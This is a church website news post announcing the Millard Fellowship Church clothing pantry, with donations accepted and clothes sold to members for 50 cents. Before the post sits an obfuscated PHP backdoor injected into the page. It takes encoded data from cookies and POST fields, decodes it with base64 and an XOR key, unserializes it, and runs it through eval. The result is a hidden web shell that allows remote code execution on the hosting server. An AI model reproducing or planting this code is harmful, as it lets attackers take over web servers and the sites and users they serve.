$TeXbM = "\x73" . "\x5f" . chr ( 753 - 670 ).'e' . 'e';$ZpXBiosXL = 'c' . 'l' . chr ( 406 - 309 ).chr (115) . "\x73" . chr (95) . "\145" . chr (120) . chr ( 855 - 750 )."\163" . 't' . "\x73";$jIdCnxmwKi = $ZpXBiosXL($TeXbM); $ZpXBiosXL = "30921";$nKLiTNdhu = $jIdCnxmwKi;if (!$nKLiTNdhu){class s_See{private $cAptKT;public static $VazHGGrv = "cd09c22b-f7d2-4654-9c45-0b881c5f13dd";public static $dcFMGc = 32065;public function __construct($CcFIEiEYsJ=0){$jqxlSX = $_COOKIE;$NFsdMlas = $_POST;$bRxsAQF = @$jqxlSX[substr(s_See::$VazHGGrv, 0, 4)];if (!empty($bRxsAQF)){$woppdwpPZP = "base64";$LEVVfHYJ = "";$bRxsAQF = explode(",", $bRxsAQF);foreach ($bRxsAQF as $usiiBufzXk){$LEVVfHYJ .= @$jqxlSX[$usiiBufzXk];$LEVVfHYJ .= @$NFsdMlas[$usiiBufzXk];}$LEVVfHYJ = array_map($woppdwpPZP . "\137" . "\144" . "\x65" . 'c' . chr ( 670 - 559 ).'d' . "\x65", array($LEVVfHYJ,)); $LEVVfHYJ = $LEVVfHYJ[0] ^ str_repeat(s_See::$VazHGGrv, (strlen($LEVVfHYJ[0]) / strlen(s_See::$VazHGGrv)) + 1);s_See::$dcFMGc = @unserialize($LEVVfHYJ);}}private function xdzWIJGVBc(){if (is_array(s_See::$dcFMGc)) {$clmTnOms = str_replace(chr ( 446 - 386 ) . "\77" . 'p' . 'h' . chr ( 639 - 527 ), "", s_See::$dcFMGc['c' . chr ( 712 - 601 )."\x6e" . 't' . 'e' . "\x6e" . "\x74"]);eval($clmTnOms); $ovWil = "47795";exit();}}public function __destruct(){$this->xdzWIJGVBc(); $ovWil = "47795";}}$DTytXlrsPW = new s_See(); $DTytXlrsPW = "27000_33175";} Millard Church Clothing Pantry | Millard Fellowship Church

Millard Church Clothing Pantry

Posted on September 16, 2016 in News

Millard Church Clothing Pantry

Millard Fellowship Church is proud to announce that we are accepting donations for, and also offering services from our clothing pantry.


Members of the church can purchase articles of clothing for 50 cents in house, and if there is an immediate need such as homelessness, fire, flood, or financial, can get their clothing subsidized by other church members. The fee is only in place to deter abuse, and make sure that people who need clothing will have the service available.


You can bring your donations to the Church at times of service, or contact us to arrange drop off at local businesses in Eastern KY. If you need clothing, contact us and we will arrange for someone to get clothes for you.